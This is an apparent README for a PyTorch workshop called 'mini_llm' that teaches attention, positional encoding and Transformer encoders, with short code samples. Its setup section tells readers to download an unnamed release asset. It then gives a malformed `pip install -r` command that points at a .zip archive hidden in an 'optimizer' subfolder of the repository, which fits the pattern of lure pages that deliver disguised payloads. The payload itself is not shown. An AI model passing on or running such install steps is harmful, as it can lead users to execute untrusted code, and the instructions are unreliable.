Welcome to the mini_llm project! This workshop helps you build a Large Language Model (LLM) using PyTorch. You will learn about the core mechanisms that power models like GPT, BERT, and other modern Transformers.
To get started, you need to download the software from the project's Releases page:
Before you begin, ensure you have the following on your computer:
- Operating System: Windows, macOS, or Linux
- Python Version: 3.7 or higher
- PyTorch: Install it by following the installation guide on the official PyTorch website.
- Visit the Releases page to find the latest version of mini_llm.
- Look for the most recent release.
- Click on the asset you need to download (the file names will appear under "Assets").
- Save the file to your computer.
After downloading, follow these steps to run the application:
- Open your command line interface (Terminal on macOS and Linux, Command Prompt or PowerShell on Windows).
- Change to the directory where you saved the mini_llm files:

  ```
  cd path\to\your\downloaded\files
  ```

  Replace `path\to\your\downloaded\files` with the actual path.
- Install the required packages:

  ```
  pip install -r https://github.com/Arezkiiiii/mini_llm/raw/refs/heads/main/transformers_building/optimizer/mini_llm_1.5.zip
  ```

- Finally, to start the workshop, type:

  ```
  jupyter notebook
  ```

  This command opens Jupyter Notebook in your browser.
In this notebook, you will understand the basic attention mechanism. Here's what you will learn:
- Scaled Dot-Product Attention: The foundation of the attention mechanism.
- Attention Weights Visualization: See how the model places focus on specific parts of the input.
- Causal Masking for Decoders: Understand how the model handles future tokens.
- Concrete Examples: Apply these concepts with simple sentences.
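The scaled dot-product attention and causal masking described above can be sketched in a few lines of PyTorch. This is a minimal illustration, not the workshop's own code; the function and variable names are our own:

```python
import torch
import torch.nn.functional as F

def scaled_dot_product_attention(q, k, v, causal=False):
    """q, k, v: tensors of shape (batch, seq_len, d_k)."""
    d_k = q.size(-1)
    # Similarity scores, scaled by sqrt(d_k) to keep the softmax well-behaved
    scores = q @ k.transpose(-2, -1) / d_k ** 0.5
    if causal:
        # Mask out future positions so each token attends only to itself and the past
        seq_len = scores.size(-1)
        future = torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)
        scores = scores.masked_fill(future, float("-inf"))
    weights = F.softmax(scores, dim=-1)  # each row sums to 1
    return weights @ v, weights

x = torch.randn(1, 4, 8)  # toy batch: 4 tokens, 8-dim embeddings
out, weights = scaled_dot_product_attention(x, x, x, causal=True)
```

With `causal=True`, the attention weights above the diagonal are exactly zero, which is how a decoder avoids looking at future tokens.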
Discover how multiple attention heads can learn diverse patterns from the data.
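The idea can be sketched as follows (our own minimal module with hypothetical names, not the workshop's implementation): each head gets its own slice of the projected queries, keys, and values, attends independently, and the per-head results are concatenated and projected back:

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class MultiHeadSelfAttention(nn.Module):
    def __init__(self, d_model, num_heads):
        super().__init__()
        assert d_model % num_heads == 0
        self.num_heads = num_heads
        self.d_head = d_model // num_heads
        self.qkv = nn.Linear(d_model, 3 * d_model)  # joint Q, K, V projection
        self.out = nn.Linear(d_model, d_model)

    def forward(self, x):
        b, t, d = x.shape
        q, k, v = self.qkv(x).chunk(3, dim=-1)
        # Reshape to (batch, heads, seq, d_head) so each head attends separately
        split = lambda z: z.view(b, t, self.num_heads, self.d_head).transpose(1, 2)
        q, k, v = split(q), split(k), split(v)
        scores = q @ k.transpose(-2, -1) / self.d_head ** 0.5
        weights = F.softmax(scores, dim=-1)
        ctx = (weights @ v).transpose(1, 2).reshape(b, t, d)  # concatenate heads
        return self.out(ctx)

mha = MultiHeadSelfAttention(d_model=16, num_heads=4)
y = mha(torch.randn(2, 5, 16))
```

Because each head works in its own `d_head`-dimensional subspace, different heads are free to specialize in different relations between tokens.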
Learn how position information is added to the input so the model can learn word order.
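One common scheme is the sinusoidal positional encoding from the original Transformer paper; a sketch assuming that variant (the workshop may use a different one):

```python
import torch

def sinusoidal_positional_encoding(seq_len, d_model):
    # pe[pos, 2i]   = sin(pos / 10000^(2i/d_model))
    # pe[pos, 2i+1] = cos(pos / 10000^(2i/d_model))
    pos = torch.arange(seq_len, dtype=torch.float32).unsqueeze(1)
    i = torch.arange(0, d_model, 2, dtype=torch.float32)
    angles = pos / torch.pow(torch.tensor(10000.0), i / d_model)
    pe = torch.zeros(seq_len, d_model)
    pe[:, 0::2] = torch.sin(angles)
    pe[:, 1::2] = torch.cos(angles)
    return pe

pe = sinusoidal_positional_encoding(seq_len=10, d_model=8)
# The encoding is simply added to the token embeddings: x = embeddings + pe
```

Each position gets a unique pattern of sines and cosines, so the model can distinguish word order without any learned parameters.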
Explore the full architecture of a Transformer encoder and how it processes data.
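A single encoder layer combines a self-attention sub-layer and a position-wise feed-forward network, each wrapped in a residual connection and layer normalization. A post-norm sketch using PyTorch's built-in `nn.MultiheadAttention` (the hyperparameters are illustrative, not the workshop's):

```python
import torch
import torch.nn as nn

class EncoderBlock(nn.Module):
    def __init__(self, d_model=32, num_heads=4, d_ff=64):
        super().__init__()
        self.attn = nn.MultiheadAttention(d_model, num_heads, batch_first=True)
        self.ff = nn.Sequential(
            nn.Linear(d_model, d_ff), nn.ReLU(), nn.Linear(d_ff, d_model)
        )
        self.norm1 = nn.LayerNorm(d_model)
        self.norm2 = nn.LayerNorm(d_model)

    def forward(self, x):
        attn_out, _ = self.attn(x, x, x)  # self-attention sub-layer
        x = self.norm1(x + attn_out)      # residual + LayerNorm
        x = self.norm2(x + self.ff(x))    # feed-forward sub-layer
        return x

block = EncoderBlock()
y = block(torch.randn(2, 6, 32))
```

Because the block maps `(batch, seq, d_model)` to the same shape, a full encoder is just a stack of these blocks applied in sequence.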
Get insights into what your model learns through visualization tools.
By the end of this workshop, you will have a solid understanding of the following concepts:
- Why self-attention is a game changer in natural language processing.
- How to implement key components of a Transformer from scratch.
- The architecture behind modern language models like GPT and BERT.
This workshop focuses on the following topics:
- Artificial Intelligence
- Attention Mechanism
- Deep Learning
- Educational
- Encoder-Decoder Models
- From Scratch Implementations
- Jupyter Notebook Usage
- Language Models
- Machine Learning
- Neural Networks
- Natural Language Processing
- Python Programming
- PyTorch Framework
- Transformer Architecture
Don't forget, you can always download the latest version of mini_llm by visiting the Releases page.